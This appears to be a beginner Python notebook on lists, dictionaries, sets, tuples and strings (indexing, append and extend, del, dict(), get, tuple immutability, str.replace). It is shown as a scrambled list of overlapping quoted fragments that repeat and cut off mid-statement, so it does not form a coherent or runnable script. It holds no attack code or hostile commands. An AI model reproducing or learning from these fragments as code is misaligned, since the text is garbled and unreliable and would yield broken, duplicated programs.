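# namespace ('A_Gather_Form_V1' -> 'A_Gather_Form'). A one-line sketch of that
# convention (editor-supplied illustration; the real rule lives in
# app.index_handler and may differ):
def _alias_from_namespace_sketch(namespace):
    import re
    return re.sub(r'_[Vv]\d+$', '', namespace)
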
index", "1) assert(first('$._doc', index) is not None) assert(first(f'$._doc.properties.{geo_name}.type', index) == 'geo_point')", "es.search(index=index_name, body={ \"query\": {\"term\": {\"poly\": 1001}} }) assert(res.get('hits').get('max_score') == 1.0)", "copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # #", "'not found'}, status=404 ) res = requests.get('http://bad-url') with pytest.raises(requests.exceptions.HTTPError): index_handler.handle_http(res)", "es_options={}, name='test1', tenant='test-tenant', schema=PolySchemaB ) alias = index_handler.get_alias_from_namespace(PolySchemaA.name) # register", "indent=2)) assert(first('$.name', index) == f'{tenant}.{name}') geo_name = es_options['geo_point_name'] assert(first( f'$.body.mappings._doc.properties.{geo_name}',", "and limitations # under the License. import json import pytest", "\"1001\"}} }) assert(res.get('hits').get('max_score') == 1.0) # find by string res", "# under the License. import json import pytest import requests", "index = index_handler.get_index_for_topic(name, geo_name, auto_ts, ComplexSchema) index = index.get('mappings', None)", "applicable law or agreed to in writing, # software distributed", "@pytest.mark.unit def test___format_lookups(ComplexSchema): formatted = index_handler._format_lookups(ComplexSchema) assert( json.dumps( formatted.get( 'operational_status'),", "is distributed on an # \"AS IS\" BASIS, WITHOUT WARRANTIES", "{}).get('title') == name) @pytest.mark.unit def test___find_timestamp(ComplexSchema): result = index_handler._find_timestamp(ComplexSchema) assert(result", "es.search(index=index_name, body={ \"query\": {\"term\": {\"poly\": \"1001\"}} }) assert(res.get('hits').get('max_score') < 1.0)", "test__update_es_index(TestElasticsearch, PolySchemaA, PolySchemaB): # register index with mapping es =", "== 'integer') assert(first('$.username.type', res) == 'keyword') assert(first('$._start.type', res) == 'date')", "# http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or", "doc = { 'id': doc_id, 'poly': '1001' } index_a =", "AutoGenSchema) assert(res.get('attributes', {}).get('title') == name) @pytest.mark.unit def test___find_timestamp(ComplexSchema): result =", "this work for additional information # regarding copyright ownership. #", "}) assert(res.get('hits').get('max_score') == 1.0) # find by string res =", "software distributed under the License is distributed on an #", "string res = es.search(index=index_name, body={ \"query\": {\"term\": {\"poly\": 1001}} })", "== 'epoch_millis') assert(len(list(res.keys())) == 55) @pytest.mark.unit def test__make_kibana_index(AutoGenSchema): name =", "get_logger from app import index_handler from . import * #", "Licensed under the Apache License, Version 2.0 (the 'License'); #", "index_handler.get_alias_from_namespace(PolySchemaA.name) # register schema A index_handler.update_es_index(es, index_a, 'test-tenant', alias) #", "tenant='test-tenant', schema=PolySchemaA ) index_name = index_a.get('name') index_b = index_handler.get_es_index_from_subscription( es_options={},", "a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 #", "res) == 'integer') assert(first('$.username.type', res) == 'keyword') assert(first('$._start.type', res) ==", "SubscriptionDefinition.get('es_options') tenant = 'dev' name = 'a-topic' alias = es_options.get('alias_name')", "governing permissions and limitations # under the License. 
import json", "json={'error': 'not found'}, status=404 ) res = requests.get('http://bad-url') with pytest.raises(requests.exceptions.HTTPError):", "'operational_status'), sort_keys=True) ) @pytest.mark.unit def test___format_single_lookup(ComplexSchema): matching = ComplexSchema.get_node('MySurvey.operational_status') res", "found'}, status=404 ) res = requests.get('http://bad-url') with pytest.raises(requests.exceptions.HTTPError): index_handler.handle_http(res) @pytest.mark.unit", "assert(first('$.mandatory_date.type', res) == 'date') assert(first('$.mandatory_date.format', res) == 'date') assert(first('$.optional_dt.type', res)", "json.dumps( formatted.get( 'operational_status'), sort_keys=True) == json.dumps( SAMPLE_FIELD_LOOKUP.get( 'operational_status'), sort_keys=True) )", "res) == 'epoch_millis') assert(len(list(res.keys())) == 55) @pytest.mark.unit def test__make_kibana_index(AutoGenSchema): name", "# fixtures LOG = get_logger('TEST-IDX') # convenience function for jsonpath", "index_handler.make_kibana_index(name, AutoGenSchema) assert(res.get('attributes', {}).get('title') == name) @pytest.mark.unit def test___find_timestamp(ComplexSchema): result", "'epoch_millis') assert(len(list(res.keys())) == 55) @pytest.mark.unit def test__make_kibana_index(AutoGenSchema): name = 'kibana-index-name'", "# KIND, either express or implied. See the License for", "\"query\": {\"term\": {\"poly\": \"1001\"}} }) assert(res.get('hits').get('max_score') == 1.0) # find", "= index_handler.get_alias_from_namespace(namespace) assert(res == 'A_Gather_Form') @pytest.mark.integration def test__update_es_index(TestElasticsearch, PolySchemaA, PolySchemaB):", "tenant='test-tenant', schema=PolySchemaB ) alias = index_handler.get_alias_from_namespace(PolySchemaA.name) # register schema A", "assert(res.get('hits').get('max_score') == 1.0) # find by string res = es.search(index=index_name,", "language governing permissions and limitations # under the License. import", "import get_logger from app import index_handler from . import *", "\"1001\"}} }) assert(res.get('hits').get('max_score') < 1.0) # find imperfect by string", "B index_handler.update_es_index(es, index_b, 'test-tenant', alias) es.indices.refresh(index=index_name) res = es.search(index=index_name, body={", "index_handler.get_index_for_topic(name, geo_name, auto_ts, ComplexSchema) index = index.get('mappings', None) assert(len(index) ==", "by applicable law or agreed to in writing, # software", "body=doc ) es.indices.refresh(index=index_name) res = es.search(index=index_name, body={ \"query\": {\"term\": {\"poly\":", "# Unless required by applicable law or agreed to in", "= index_handler.get_alias_from_namespace(PolySchemaA.name) # register schema A index_handler.update_es_index(es, index_a, 'test-tenant', alias)", "for additional information # regarding copyright ownership. # # Licensed", "= index_handler.get_es_index_from_subscription( es_options={}, name='test1', tenant='test-tenant', schema=PolySchemaA ) index_name = index_a.get('name')", "@pytest.mark.unit def test__get_index_for_topic(SubscriptionDefinition, ComplexSchema): name = 'Person' es_options = SubscriptionDefinition.get('es_options')", "IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND,", "imperfect by string # migrate to schema B index_handler.update_es_index(es, index_b,", "License. You may obtain a copy of the License at", "under the License. 
import json import pytest import requests import", "You may obtain a copy of the License at #", "ComplexSchema ) LOG.debug(json.dumps(index, indent=2)) assert(first('$.name', index) == f'{tenant}.{name}') geo_name =", "index = index.get('mappings', None) assert(len(index) == 1) assert(first('$._doc', index) is", "limitations # under the License. import json import pytest import", "= get_logger('TEST-IDX') # convenience function for jsonpath @responses.activate @pytest.mark.unit def", "== 'geo_point') assert(first(f'$._doc._meta.aet_auto_ts', index) == auto_ts) @pytest.mark.unit def test__get_es_types_from_schema(ComplexSchema): res", "body={ \"query\": {\"term\": {\"poly\": \"1001\"}} }) assert(res.get('hits').get('max_score') == 1.0) #", "index_handler.handle_http(res) @pytest.mark.unit def test__get_es_index_from_autoconfig(SubscriptionDefinition, ComplexSchema): es_options = SubscriptionDefinition.get('es_options') tenant =", "def test__make_kibana_index(AutoGenSchema): name = 'kibana-index-name' res = index_handler.make_kibana_index(name, AutoGenSchema) assert(res.get('attributes',", "get_logger('TEST-IDX') # convenience function for jsonpath @responses.activate @pytest.mark.unit def test__handle_http():", "# convenience function for jsonpath @responses.activate @pytest.mark.unit def test__handle_http(): responses.add(", "test___format_single_lookup(ComplexSchema): matching = ComplexSchema.get_node('MySurvey.operational_status') res = index_handler._format_single_lookup(matching) assert( json.dumps(res, sort_keys=True)", ". import * # noqa # fixtures LOG = get_logger('TEST-IDX')", "assert(first('$.username.type', res) == 'keyword') assert(first('$._start.type', res) == 'date') assert(first('$.geometry.type', res)", "'License'); # you may not use this file except in" ]
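The assertions above lean on a first(path, obj) helper that arrives through the wildcard fixture import; its definition is not shown in this file. A minimal sketch of such a jsonpath convenience function, assuming the jsonpath-ng package (both the helper body and the library choice are assumptions, not taken from the source):

from jsonpath_ng import parse

def first(path, obj):
    # Return the value of the first jsonpath match in obj, or None when
    # nothing matches. Illustrative only; the real helper lives in the fixtures.
    matches = [m.value for m in parse(path).find(obj)]
    return matches[0] if matches else None

With that shape, first('$.beds.type', res) plucks a single mapped type out of a nested mapping dict without manual dictionary walking.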
[ "print(odd) # In[13]: # Deleting list items my_list = ['p',", "# Changing tuple values my_tuple = (4, 2, 3, [6,", "# In[13]: # Deleting list items my_list = ['p', 'r',", "extend to multiple lines String_var = \"\"\" This document will", "'a', 'm', 'i', 'z') print(my_tuple) # In[37]: #String and its", "my_dict['age'] = 27 #Output: {'age': 27, 'name': 'Jack'} print(my_dict) #", "# In[26]: #Tuple and its method # In[27]: # Tuple", "explore all the concepts of Python Strings!!! \"\"\" # Replace", "entire list del my_list # In[14]: # Appending and Extending", "integers my_list = [1, 2, 3] # list with mixed", "odd.extend([9, 11, 13]) print(odd) # In[15]: #Dictionary and function #", "2:'ball'}) # from sequence having each item as a pair", "in Python odd = [1, 3, 5] odd.append(7) print(odd) odd.extend([9,", "{'name': 'Jack', 'age': 26} # update value my_dict['age'] = 27", "indexing print(n_list[0][1]) print(n_list[1][3]) # Error! Only integer can be used", "each item as a pair my_dict = dict([(1,'apple'), (2,'ball')]) #", "# Output: {'address': 'Downtown', 'age': 27, 'name': 'Jack'} print(my_dict) #", "= {1.0, \"Hello\", (1, 2, 3)} print(my_set) # In[25]: #", "my_set = {1.0, \"Hello\", (1, 2, 3)} print(my_set) # In[25]:", "print(my_list[0]) # Output: o print(my_list[2]) # Output: e print(my_list[4]) #", "In[30]: # Accessing tuple elements using indexing my_tuple = ('p','e','r','m','i','t')", "= [\"mouse\", [8, 4, 6], ['a']] # In[11]: # List", "document will help you to explore all the concepts of", "= [1, \"Hello\", 3.4] # In[7]: # nested list my_list", "1, 5]] # Nested indexing print(n_list[0][1]) print(n_list[1][3]) # Error! Only", "= ['p', 'r', 'o', 'b', 'l', 'e', 'm'] # delete", "# empty list my_list = [] # list of integers", "examples - all assignments are identical. 
String_var = 'Python' String_var", "print(my_dict['name']) # Output: 26 print(my_dict.get('age')) # In[21]: # Changing and", "{'address': 'Downtown', 'age': 27, 'name': 'Jack'} print(my_dict) # In[22]: #Sets", "and store in another variable substr_var = String_var.replace(\"document\", \"tutorial\") print", "Changing and adding Dictionary Elements my_dict = {'name': 'Jack', 'age':", "'m'] # delete one item del my_list[2] print(my_list) # delete", "its function # In[23]: my_set = {1, 2, 3} print(my_set)", "my_tuple = ('p', 'r', 'o', 'g', 'r', 'a', 'm', 'i',", "'r', 'a', 'm', 'i', 'z') # Output: ('p', 'r', 'o',", "# In[32]: print(my_tuple[-6]) # In[36]: # Changing tuple values my_tuple", "using dict() my_dict = dict({1:'apple', 2:'ball'}) # from sequence having", "\"\"\" # Replace \"document\" with \"tutorial\" and store in another", "changed my_tuple[3][0] = 9 # Output: (4, 2, 3, [9,", "# Appending and Extending lists in Python odd = [1,", "'age': 26} # Output: Jack print(my_dict['name']) # Output: 26 print(my_dict.get('age'))", "In[9]: # Appending and Extending lists in Python odd =", "3, 4, 3, 2} print(my_set) # In[26]: #Tuple and its", "= dict({1:'apple', 2:'ball'}) # from sequence having each item as", "String_var = \"\"\"Python\"\"\" # with Triple quotes Strings can extend", "# In[7]: # nested list my_list = [\"mouse\", [8, 4,", "Output: ('p', 'r', 'o', 'g', 'r', 'a', 'm', 'i', 'z')", "\"\"\" This document will help you to explore all the", "# Output: Jack print(my_dict['name']) # Output: 26 print(my_dict.get('age')) # In[21]:", "9 # Output: (4, 2, 3, [9, 5]) print(my_tuple) #", "my_list = ['p', 'r', 'o', 'b', 'l', 'e', 'm'] #", "{1.0, \"Hello\", (1, 2, 3)} print(my_set) # In[25]: # set", "= [\"Happy\", [2, 0, 1, 5]] # Nested indexing print(n_list[0][1])", "lists in Python odd = [1, 3, 5] odd.append(7) print(odd)", "Output: p print(my_list[0]) # Output: o print(my_list[2]) # Output: e", "{'name': 'John', 1: [2, 4, 3]} # using dict() my_dict", "# In[24]: my_set = {1.0, \"Hello\", (1, 2, 3)} print(my_set)", "with mixed keys my_dict = {'name': 'John', 1: [2, 4,", "have duplicates my_set = {1, 2, 3, 4, 3, 2}", "elements using indexing my_tuple = ('p','e','r','m','i','t') print(my_tuple[0]) print(my_tuple[5]) # In[31]:", "print(type(my_tuple)) # In[30]: # Accessing tuple elements using indexing my_tuple", "add item my_dict['address'] = 'Downtown' # Output: {'address': 'Downtown', 'age':", "print(odd) # In[15]: #Dictionary and function # In[18]: y_dict =", "# get vs [] for retrieving elements my_dict = {'name':", "11, 13]) print(odd) # In[15]: #Dictionary and function # In[18]:", "0, 1, 5]] # Nested indexing print(n_list[0][1]) print(n_list[1][3]) # Error!", "In[36]: # Changing tuple values my_tuple = (4, 2, 3,", "method # In[27]: # Tuple having integers my_tuple = (1,", "#Sets and its function # In[23]: my_set = {1, 2,", "'ball'} # dictionary with mixed keys my_dict = {'name': 'John',", "dict({1:'apple', 2:'ball'}) # from sequence having each item as a", "of integers my_list = [1, 2, 3] # list with", "\"Hello\", (1, 2, 3)} print(my_set) # In[25]: # set cannot", "\"\"\"Python\"\"\" # with Triple quotes Strings can extend to multiple", "my_dict = dict({1:'apple', 2:'ball'}) # from sequence having each item", "= (\"hello\") print(type(my_tuple)) # In[30]: # Accessing tuple elements using", "and function # In[18]: y_dict = {} # dictionary with", "'tuple' object does not support item assignment # my_tuple[1] =", "my_dict = {'name': 'John', 1: [2, 4, 3]} # using", "# In[11]: # List indexing 
my_list = ['p', 'r', 'o',", "'e', 'm'] # delete one item del my_list[2] print(my_list) #", "3, [9, 5]) print(my_tuple) # Tuples can be reassigned my_tuple", "set cannot have duplicates my_set = {1, 2, 3, 4,", "#String and its function # In[38]: # Python string examples", "dictionary with integer keys my_dict = {1: 'apple', 2: 'ball'}", "list my_list = [] # list of integers my_list =", "Strings!!! \"\"\" # Replace \"document\" with \"tutorial\" and store in", "# set cannot have duplicates my_set = {1, 2, 3,", "# Accessing tuple elements using indexing my_tuple = ('p','e','r','m','i','t') print(my_tuple[0])", "for indexing print(my_list[4]) # In[9]: # Appending and Extending lists", "string examples - all assignments are identical. String_var = 'Python'", "String_var = \"Python\" String_var = \"\"\"Python\"\"\" # with Triple quotes", "# update value my_dict['age'] = 27 #Output: {'age': 27, 'name':", "in another variable substr_var = String_var.replace(\"document\", \"tutorial\") print (substr_var) #", "= {1, 2, 3} print(my_set) # In[24]: my_set = {1.0,", "# using dict() my_dict = dict({1:'apple', 2:'ball'}) # from sequence", "# delete one item del my_list[2] print(my_list) # delete multiple", "Python Strings!!! \"\"\" # Replace \"document\" with \"tutorial\" and store", "'g', 'r', 'a', 'm', 'i', 'z') # Output: ('p', 'r',", "'r', 'a', 'm', 'i', 'z') print(my_tuple) # In[37]: #String and", "(2,'ball')]) # In[20]: # get vs [] for retrieving elements", "#!/usr/bin/env python # coding: utf-8 # In[ ]: #List and", "In[11]: # List indexing my_list = ['p', 'r', 'o', 'b',", "print(my_set) # In[25]: # set cannot have duplicates my_set =", "'o', 'g', 'r', 'a', 'm', 'i', 'z') print(my_tuple) # In[37]:", "print(my_set) # In[26]: #Tuple and its method # In[27]: #", "pair my_dict = dict([(1,'apple'), (2,'ball')]) # In[20]: # get vs", "26} # update value my_dict['age'] = 27 #Output: {'age': 27,", "{'age': 27, 'name': 'Jack'} print(my_dict) # add item my_dict['address'] =", "list del my_list # In[14]: # Appending and Extending lists", "odd = [1, 3, 5] odd.append(7) print(odd) odd.extend([9, 11, 13])", "# Output: p print(my_list[0]) # Output: o print(my_list[2]) # Output:", "'m', 'i', 'z') # Output: ('p', 'r', 'o', 'g', 'r',", "my_list[2] print(my_list) # delete multiple items del my_list[1:5] print(my_list) #", "having integers my_tuple = (1, 2, 3) print(my_tuple) # In[28]:", "integer keys my_dict = {1: 'apple', 2: 'ball'} # dictionary", "variable substr_var = String_var.replace(\"document\", \"tutorial\") print (substr_var) # In[ ]:", "'Downtown' # Output: {'address': 'Downtown', 'age': 27, 'name': 'Jack'} print(my_dict)", "data types my_list = [1, \"Hello\", 3.4] # In[7]: #", "item as a pair my_dict = dict([(1,'apple'), (2,'ball')]) # In[20]:", "26} # Output: Jack print(my_dict['name']) # Output: 26 print(my_dict.get('age')) #", "# dictionary with mixed keys my_dict = {'name': 'John', 1:", "'name': 'Jack'} print(my_dict) # In[22]: #Sets and its function #", "my_list = [] # list of integers my_list = [1,", "print(n_list[0][1]) print(n_list[1][3]) # Error! 
Only integer can be used for", "# In[38]: # Python string examples - all assignments are", "# In[27]: # Tuple having integers my_tuple = (1, 2,", "# Output: o print(my_list[2]) # Output: e print(my_list[4]) # Nested", "['p', 'r', 'o', 'b', 'e'] # Output: p print(my_list[0]) #", "# Deleting list items my_list = ['p', 'r', 'o', 'b',", "= ['p', 'r', 'o', 'b', 'e'] # Output: p print(my_list[0])", "print(my_tuple[-1]) # In[32]: print(my_tuple[-6]) # In[36]: # Changing tuple values", "help you to explore all the concepts of Python Strings!!!", "In[14]: # Appending and Extending lists in Python odd =", "my_set = {1, 2, 3} print(my_set) # In[24]: my_set =", "tuple elements using indexing my_tuple = ('p','e','r','m','i','t') print(my_tuple[0]) print(my_tuple[5]) #", "its function # In[38]: # Python string examples - all", "# from sequence having each item as a pair my_dict", "items del my_list[1:5] print(my_list) # delete entire list del my_list", "print(my_tuple) # Tuples can be reassigned my_tuple = ('p', 'r',", "odd.extend([9, 11, 13]) print(odd) # In[13]: # Deleting list items", "'r', 'o', 'g', 'r', 'a', 'm', 'i', 'z') print(my_tuple) #", "2, 3)} print(my_set) # In[25]: # set cannot have duplicates", "= \"\"\" This document will help you to explore all", "= 'Downtown' # Output: {'address': 'Downtown', 'age': 27, 'name': 'Jack'}", "using indexing my_tuple = ('p','e','r','m','i','t') print(my_tuple[0]) print(my_tuple[5]) # In[31]: print(my_tuple[-1])", "n_list = [\"Happy\", [2, 0, 1, 5]] # Nested indexing", "'Jack', 'age': 26} # update value my_dict['age'] = 27 #Output:", "odd.append(7) print(odd) odd.extend([9, 11, 13]) print(odd) # In[15]: #Dictionary and", "print(my_list[4]) # In[9]: # Appending and Extending lists in Python", "13]) print(odd) # In[13]: # Deleting list items my_list =", "Tuple having integers my_tuple = (1, 2, 3) print(my_tuple) #", "can extend to multiple lines String_var = \"\"\" This document", "my_set = {1, 2, 3, 4, 3, 2} print(my_set) #", "function # In[6]: # empty list my_list = [] #", "integers my_tuple = (1, 2, 3) print(my_tuple) # In[28]: my_tuple", "does not support item assignment # my_tuple[1] = 9 #", "(1, 2, 3) print(my_tuple) # In[28]: my_tuple = (\"hello\") print(type(my_tuple))", "get vs [] for retrieving elements my_dict = {'name': 'Jack',", "print(odd) odd.extend([9, 11, 13]) print(odd) # In[13]: # Deleting list", "my_tuple = (1, 2, 3) print(my_tuple) # In[28]: my_tuple =", "4, 6], ['a']] # In[11]: # List indexing my_list =", "5]) # TypeError: 'tuple' object does not support item assignment", "'o', 'b', 'e'] # Output: p print(my_list[0]) # Output: o", "3]} # using dict() my_dict = dict({1:'apple', 2:'ball'}) # from", "27 #Output: {'age': 27, 'name': 'Jack'} print(my_dict) # add item", "\"Python\" String_var = \"\"\"Python\"\"\" # with Triple quotes Strings can", "print(my_list[4]) # Nested List n_list = [\"Happy\", [2, 0, 1,", "#Output: {'age': 27, 'name': 'Jack'} print(my_dict) # add item my_dict['address']", "27, 'name': 'Jack'} print(my_dict) # add item my_dict['address'] = 'Downtown'", "= (4, 2, 3, [6, 5]) # TypeError: 'tuple' object", "print(my_list[2]) # Output: e print(my_list[4]) # Nested List n_list =", "26 print(my_dict.get('age')) # In[21]: # Changing and adding Dictionary Elements", "values my_tuple = (4, 2, 3, [6, 5]) # TypeError:", "mutable element can be changed my_tuple[3][0] = 9 # Output:", "2, 3, [6, 5]) # TypeError: 'tuple' object does not", "In[23]: my_set = {1, 2, 3} print(my_set) # In[24]: my_set", "[] # list of integers my_list = [1, 2, 
3]", "# list with mixed data types my_list = [1, \"Hello\",", "# In[14]: # Appending and Extending lists in Python odd", "print(odd) odd.extend([9, 11, 13]) print(odd) # In[15]: #Dictionary and function", "String_var = 'Python' String_var = \"Python\" String_var = \"\"\"Python\"\"\" #", "e print(my_list[4]) # Nested List n_list = [\"Happy\", [2, 0,", "5]] # Nested indexing print(n_list[0][1]) print(n_list[1][3]) # Error! Only integer", "Only integer can be used for indexing print(my_list[4]) # In[9]:", "List indexing my_list = ['p', 'r', 'o', 'b', 'e'] #", "= 'Python' String_var = \"Python\" String_var = \"\"\"Python\"\"\" # with", "Appending and Extending lists in Python odd = [1, 3,", "= {'name': 'John', 1: [2, 4, 3]} # using dict()", "Tuples can be reassigned my_tuple = ('p', 'r', 'o', 'g',", "'a', 'm', 'i', 'z') # Output: ('p', 'r', 'o', 'g',", "[\"mouse\", [8, 4, 6], ['a']] # In[11]: # List indexing", "[2, 4, 3]} # using dict() my_dict = dict({1:'apple', 2:'ball'})", "Output: {'address': 'Downtown', 'age': 27, 'name': 'Jack'} print(my_dict) # In[22]:", "# In[20]: # get vs [] for retrieving elements my_dict", "Python odd = [1, 3, 5] odd.append(7) print(odd) odd.extend([9, 11,", "can be changed my_tuple[3][0] = 9 # Output: (4, 2,", "my_dict = {'name': 'Jack', 'age': 26} # Output: Jack print(my_dict['name'])", "In[37]: #String and its function # In[38]: # Python string", "assignments are identical. String_var = 'Python' String_var = \"Python\" String_var", "6], ['a']] # In[11]: # List indexing my_list = ['p',", "keys my_dict = {1: 'apple', 2: 'ball'} # dictionary with", "#Tuple and its method # In[27]: # Tuple having integers", "# Output: ('p', 'r', 'o', 'g', 'r', 'a', 'm', 'i',", "p print(my_list[0]) # Output: o print(my_list[2]) # Output: e print(my_list[4])", "This document will help you to explore all the concepts", "be changed my_tuple[3][0] = 9 # Output: (4, 2, 3,", "# Tuple having integers my_tuple = (1, 2, 3) print(my_tuple)", "# list of integers my_list = [1, 2, 3] #", "Accessing tuple elements using indexing my_tuple = ('p','e','r','m','i','t') print(my_tuple[0]) print(my_tuple[5])", "my_tuple = (4, 2, 3, [6, 5]) # TypeError: 'tuple'", "# TypeError: 'tuple' object does not support item assignment #", "Changing tuple values my_tuple = (4, 2, 3, [6, 5])", "'Jack'} print(my_dict) # add item my_dict['address'] = 'Downtown' # Output:", "from sequence having each item as a pair my_dict =", "duplicates my_set = {1, 2, 3, 4, 3, 2} print(my_set)", "Output: (4, 2, 3, [9, 5]) print(my_tuple) # Tuples can", "and function # In[6]: # empty list my_list = []", "List n_list = [\"Happy\", [2, 0, 1, 5]] # Nested", "Output: 26 print(my_dict.get('age')) # In[21]: # Changing and adding Dictionary", "with mixed data types my_list = [1, \"Hello\", 3.4] #", "'o', 'b', 'l', 'e', 'm'] # delete one item del", "to explore all the concepts of Python Strings!!! 
\"\"\" #", "3, 5] odd.append(7) print(odd) odd.extend([9, 11, 13]) print(odd) # In[13]:", "# In[36]: # Changing tuple values my_tuple = (4, 2,", "In[20]: # get vs [] for retrieving elements my_dict =", "In[ ]: #List and function # In[6]: # empty list", "nested list my_list = [\"mouse\", [8, 4, 6], ['a']] #", "# delete multiple items del my_list[1:5] print(my_list) # delete entire", "['a']] # In[11]: # List indexing my_list = ['p', 'r',", "2, 3, 4, 3, 2} print(my_set) # In[26]: #Tuple and", "Strings can extend to multiple lines String_var = \"\"\" This", "5] odd.append(7) print(odd) odd.extend([9, 11, 13]) print(odd) # In[15]: #Dictionary", "In[26]: #Tuple and its method # In[27]: # Tuple having", "3, 2} print(my_set) # In[26]: #Tuple and its method #", "print(my_tuple[0]) print(my_tuple[5]) # In[31]: print(my_tuple[-1]) # In[32]: print(my_tuple[-6]) # In[36]:", "another variable substr_var = String_var.replace(\"document\", \"tutorial\") print (substr_var) # In[", "value my_dict['age'] = 27 #Output: {'age': 27, 'name': 'Jack'} print(my_dict)", "dict([(1,'apple'), (2,'ball')]) # In[20]: # get vs [] for retrieving", "9 # However, item of mutable element can be changed", "Nested List n_list = [\"Happy\", [2, 0, 1, 5]] #", "element can be changed my_tuple[3][0] = 9 # Output: (4,", "Elements my_dict = {'name': 'Jack', 'age': 26} # update value", "will help you to explore all the concepts of Python", "5]) print(my_tuple) # Tuples can be reassigned my_tuple = ('p',", "# Replace \"document\" with \"tutorial\" and store in another variable", "13]) print(odd) # In[15]: #Dictionary and function # In[18]: y_dict", "[6, 5]) # TypeError: 'tuple' object does not support item", "# List indexing my_list = ['p', 'r', 'o', 'b', 'e']", "sequence having each item as a pair my_dict = dict([(1,'apple'),", "object does not support item assignment # my_tuple[1] = 9", "'name': 'Jack'} print(my_dict) # add item my_dict['address'] = 'Downtown' #", "{} # dictionary with integer keys my_dict = {1: 'apple',", "my_list = [1, 2, 3] # list with mixed data", "(4, 2, 3, [6, 5]) # TypeError: 'tuple' object does", "# In[6]: # empty list my_list = [] # list", "my_list = [1, \"Hello\", 3.4] # In[7]: # nested list", "String_var = \"\"\" This document will help you to explore", "mixed keys my_dict = {'name': 'John', 1: [2, 4, 3]}", "dict() my_dict = dict({1:'apple', 2:'ball'}) # from sequence having each", "However, item of mutable element can be changed my_tuple[3][0] =", "'z') print(my_tuple) # In[37]: #String and its function # In[38]:", "empty list my_list = [] # list of integers my_list", "= 27 #Output: {'age': 27, 'name': 'Jack'} print(my_dict) # add", "= \"\"\"Python\"\"\" # with Triple quotes Strings can extend to", "del my_list[2] print(my_list) # delete multiple items del my_list[1:5] print(my_list)", "# add item my_dict['address'] = 'Downtown' # Output: {'address': 'Downtown',", "'age': 26} # update value my_dict['age'] = 27 #Output: {'age':", "In[28]: my_tuple = (\"hello\") print(type(my_tuple)) # In[30]: # Accessing tuple", "indexing my_tuple = ('p','e','r','m','i','t') print(my_tuple[0]) print(my_tuple[5]) # In[31]: print(my_tuple[-1]) #", "all assignments are identical. String_var = 'Python' String_var = \"Python\"", "of Python Strings!!! \"\"\" # Replace \"document\" with \"tutorial\" and", "all the concepts of Python Strings!!! 
\"\"\" # Replace \"document\"", "my_dict = {1: 'apple', 2: 'ball'} # dictionary with mixed", "having each item as a pair my_dict = dict([(1,'apple'), (2,'ball')])", "my_tuple = (\"hello\") print(type(my_tuple)) # In[30]: # Accessing tuple elements", "\"Hello\", 3.4] # In[7]: # nested list my_list = [\"mouse\",", "store in another variable substr_var = String_var.replace(\"document\", \"tutorial\") print (substr_var)", "# coding: utf-8 # In[ ]: #List and function #", "[8, 4, 6], ['a']] # In[11]: # List indexing my_list", "my_list = [\"mouse\", [8, 4, 6], ['a']] # In[11]: #", "print(my_tuple) # In[37]: #String and its function # In[38]: #", "'m', 'i', 'z') print(my_tuple) # In[37]: #String and its function", "= dict([(1,'apple'), (2,'ball')]) # In[20]: # get vs [] for", "= (1, 2, 3) print(my_tuple) # In[28]: my_tuple = (\"hello\")", "concepts of Python Strings!!! \"\"\" # Replace \"document\" with \"tutorial\"", "'l', 'e', 'm'] # delete one item del my_list[2] print(my_list)", "mixed data types my_list = [1, \"Hello\", 3.4] # In[7]:", "not support item assignment # my_tuple[1] = 9 # However,", "# Tuples can be reassigned my_tuple = ('p', 'r', 'o',", "# with Triple quotes Strings can extend to multiple lines", "= [1, 3, 5] odd.append(7) print(odd) odd.extend([9, 11, 13]) print(odd)", "TypeError: 'tuple' object does not support item assignment # my_tuple[1]", "vs [] for retrieving elements my_dict = {'name': 'Jack', 'age':", "= 9 # Output: (4, 2, 3, [9, 5]) print(my_tuple)", "item my_dict['address'] = 'Downtown' # Output: {'address': 'Downtown', 'age': 27,", "its method # In[27]: # Tuple having integers my_tuple =", "indexing print(my_list[4]) # In[9]: # Appending and Extending lists in", "'Jack', 'age': 26} # Output: Jack print(my_dict['name']) # Output: 26", "4, 3, 2} print(my_set) # In[26]: #Tuple and its method", "# In[15]: #Dictionary and function # In[18]: y_dict = {}", "In[24]: my_set = {1.0, \"Hello\", (1, 2, 3)} print(my_set) #", "('p', 'r', 'o', 'g', 'r', 'a', 'm', 'i', 'z') print(my_tuple)", "3, [6, 5]) # TypeError: 'tuple' object does not support", "In[15]: #Dictionary and function # In[18]: y_dict = {} #", "# In[31]: print(my_tuple[-1]) # In[32]: print(my_tuple[-6]) # In[36]: # Changing", "my_list = ['p', 'r', 'o', 'b', 'e'] # Output: p", "Output: Jack print(my_dict['name']) # Output: 26 print(my_dict.get('age')) # In[21]: #", "2, 3) print(my_tuple) # In[28]: my_tuple = (\"hello\") print(type(my_tuple)) #", "# In[18]: y_dict = {} # dictionary with integer keys", "python # coding: utf-8 # In[ ]: #List and function", "# In[21]: # Changing and adding Dictionary Elements my_dict =", "{1, 2, 3, 4, 3, 2} print(my_set) # In[26]: #Tuple", "'e'] # Output: p print(my_list[0]) # Output: o print(my_list[2]) #", "and adding Dictionary Elements my_dict = {'name': 'Jack', 'age': 26}", "# Nested List n_list = [\"Happy\", [2, 0, 1, 5]]", "with integer keys my_dict = {1: 'apple', 2: 'ball'} #", "4, 3]} # using dict() my_dict = dict({1:'apple', 2:'ball'}) #", "In[38]: # Python string examples - all assignments are identical.", "'r', 'o', 'g', 'r', 'a', 'm', 'i', 'z') # Output:", "'Python' String_var = \"Python\" String_var = \"\"\"Python\"\"\" # with Triple", "2, 3} print(my_set) # In[24]: my_set = {1.0, \"Hello\", (1,", "list of integers my_list = [1, 2, 3] # list", "be used for indexing print(my_list[4]) # In[9]: # Appending and", "Extending lists in Python odd = [1, 3, 5] odd.append(7)", "3) print(my_tuple) # In[28]: my_tuple = (\"hello\") print(type(my_tuple)) # In[30]:", "[1, 3, 5] 
